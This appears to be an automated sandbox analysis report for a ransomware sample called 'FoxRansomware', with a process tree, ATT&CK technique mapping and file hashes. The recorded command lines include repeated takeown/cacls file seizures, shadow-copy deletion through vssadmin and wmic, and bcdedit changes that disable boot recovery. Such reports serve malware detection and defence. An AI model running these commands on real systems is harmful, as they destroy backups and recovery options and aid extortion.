C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:3496
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Modifies file permissions
PID:3936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner3⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "behavior.xml" -nobanner4⤵PID:1732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:1276
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:3840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:2428
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1308
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:3472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:4088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:2656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:3608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:3512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:3384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:2356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner3⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "behavior.xml" -nobanner4⤵PID:3452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:2256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:2676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:3228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵
- Modifies file permissions
PID:332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:2800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:2316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner3⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "background.png" -nobanner4⤵PID:2740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4116
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵
- Modifies file permissions
PID:812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner3⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "tasks.xml" -nobanner4⤵PID:1156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:2888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:2160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:3024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "overlay.png" -nobanner3⤵PID:3668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "overlay.png" -nobanner4⤵PID:2000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:3864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:4152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:1612
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:3140
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:3632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:2328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:4048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:3400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:3100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:3188
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:3616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:3360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:2100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "main.css" -nobanner3⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "main.css" -nobanner4⤵PID:3740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:4200
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:4212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:3164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_shared.gif" -nobanner3⤵PID:2584
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:4288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:3340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:4076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:4328
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E611BE7D-FEF3-478E-965D-B30C774A9501} S-1-5-21-1603059206-2004189698-4139800220-1000:AILVMYUM\Admin:Interactive:[1]1⤵PID:568
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat"2⤵PID:2972
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:3348
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3296
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:2348
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:4152
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C1⤵PID:1748
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"1⤵PID:2880
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:764
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD52cb329dff6324938c420b375731911ff
SHA185cf6dc6157894a383a074573f36f13df1350bab
SHA2560454a01a2477d8898ddfe91b1816b68de69551527aed3564cbd0ed61a234faaf
SHA51283ea367f13b278d7b5061351e1dc651ebe11b12c699adef643fa2a8b91f49f4f2c999786ce57ad0b244b5a394846e940d21c4a9863a4c67033bb19083e42e2aa
-
Filesize
14B
MD5c74dacdd9331a6698efffe81ff66ac08
SHA179e8ce4bb5cc2436e95fad4a74a31aee7aa63043
SHA25682ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
SHA51224620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
-
Filesize
565B
MD5a7103cec20dcde9ef96b218bf30c774a
SHA151a60f922aa5877e15516c1c71924901c0a05e7a
SHA256579051428f8b2c8edccd1ff265b286562665dfc318d58c0ef8ce2da128cda692
SHA512e887368fe998598417f5afa8a29d54327445094a8789ebd8b05b86ffd2c92f8870db97b497f2f5d99495d09f31ac0178698f860448e131002109a9a5b1ba75cd
-
Filesize
1KB
MD5501ae4724b233030c3dc4f770ba54865
SHA173d88e9df2028f58038d94326289c2747926fd00
SHA256c08926a901c8e38861bb20e27d93c491246c292163b8c3ac328cdf8e7d3d41c8
SHA5120326b9f9fd07e9767a73df9117ff2e77a4a34d97a9a88bb9507dae62d6b09ae8644d90c3f18890777966b6f7302278d1d7b0de7059df8581ca7e34e857177779
-
Filesize
2KB
MD555ed6bebab5ed8150defece70727ac2f
SHA158feedece8dc1031c7976f6820086d240d56dc90
SHA25690626b22c7ea46303fd971194d58d39658811f13ebbf77423a5e656a1f8f74e3
SHA512a4b98c10ff55674a5dcde318d7489a91c19181980d8b50a03f49528270e1fb3e5d0b5cfefe3b3339563fea783c8bf3acb565368f4920aa6be8674bb3c1536349
-
Filesize
2KB
MD5759143ae6bba3ffc9773585f5c2a93c7
SHA13c20261b40fb0fda50afff0dd9e313554ef29eee
SHA25683ce5834f340ba8af97aeee4d7a38cd09f7da8b581ee30e48c35f8d67dc3a3aa
SHA512ba7e743a53fa71e6348a92feaf5973e29254a3a722992faee1ef10d3091311c80cdd0df2e587a144e9112306de4144f6d402f2a8ccb66d8cc6a5847953ab82f9
-
Filesize
2KB
MD5939ab114345a22c84e9eddd57f01be33
SHA133e62a5b098a67d32d847cd3069f60e12e34d237
SHA256c5140a709db4c29e84d689ae03fadaa002da7bdcec481d0f40cf60d09c1e6248
SHA512b7c8787a02ae07037c636b4f2b2942967996e41bb5d641acc45224a37d1e236c2086cabdbbf3ad4029eb310e078950638a6c1281cdd70e5a177e40d7f0334d42
-
Filesize
3KB
MD51e6a6ce9afa8582f115fe72732de44c1
SHA1f8460eebfd1e840579a0ad4dcee5395dda1d42c9
SHA256bed3c3d721a5c56dd0a5f3514abcbec507ddd4bbb12ef248e3833854dbfc282c
SHA5121159862f20e0cf2136c02d31d38a533b02014dd5719422dd9b91fdb3a801ca4995b9ad943679c22b813a2033350fe56ffc5269a7acecbd007ccc5cd27e55d01d
-
Filesize
24KB
MD5dee33529c954757369289322ac01ad10
SHA1278d129cb4bd3663a7d096123a6fae4bbd328c2d
SHA256a1fcb24f3b4d28cf34f9d929d9e755b190aa57182ef4752a766c741f19efd063
SHA5129bfb4787e3394a2f294511d337f236cb961c383a7b06d67803a2892fcdbecc69c5cbe58cffc589752175ec4b673f827f9e8ed4387a0d690b524c2d43a50aa734
-
Filesize
226B
MD58b509c42079f037beeced07732dbff55
SHA1dbd88c6e253b98523da97b9ece9aa5e28f87013a
SHA256220112d110567da3fc62869640e8d45ea1b2d84c250dd04f6632f46ca1c0c850
SHA512566587d254f3103017ccf1bc8db0fe1e0b2db313598337b01ecf83fc5e28f2e5f3094d98fc98746cf495d760f0fb3776752e3392b8dc560969f7eb608712e99a
-
Filesize
64KB
MD539384617afb7b1a4cd7b11d998292e13
SHA187689603aebba6b353bbca3d5a038c0e8e59fd4c
SHA256b41666aedfb669305f37349dfae96eea3f34ae7ba89629a268c2a403302bdbaa
SHA51252be3914e3330330a83463cc2925ffa5d0bdb1a4358f48c1298cc0c5f631a214a8d9328232f95c496642da2300f713a5f0288d6ea6af52fb0e173c1431e442e7
-
Filesize
265B
MD5ddc055839f38898e4cd9133a738f1e10
SHA1c5781213e840f9fa2d3bb8f75aaffc37eb9d4455
SHA256861f3fc0f6af2afa948352206930666a34e145f58afed65e00b92da72955afa9
SHA5127c6b02853a536a606110d29a6934132986e01f4c858c1f7ae63d550e6862cd19763cf03a2218b28f5c7bf9f834c75b563ab7bb89b14b9d43e5961009d2509089
-
Filesize
260B
MD5a5daac56df939fb556da529481ead84a
SHA15b57309009abc7e0edef430f914ef62c3bfd7313
SHA2569bdb20b60519bb326b8713d9fc9543a161b84bf782e9d31ed7cd8f57a3c12b55
SHA51205f2ce16cda3f5261815237d93ecd4579ad5d19291880b6dd4e44b6d88d0286a42cff3a561f3ea93a4a09594aba8ede86d9445ee633f5113bbcaa54b44a17642
-
Filesize
1.2MB
MD5c82d64850d35cc6a536c11adbd261cf6
SHA19f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6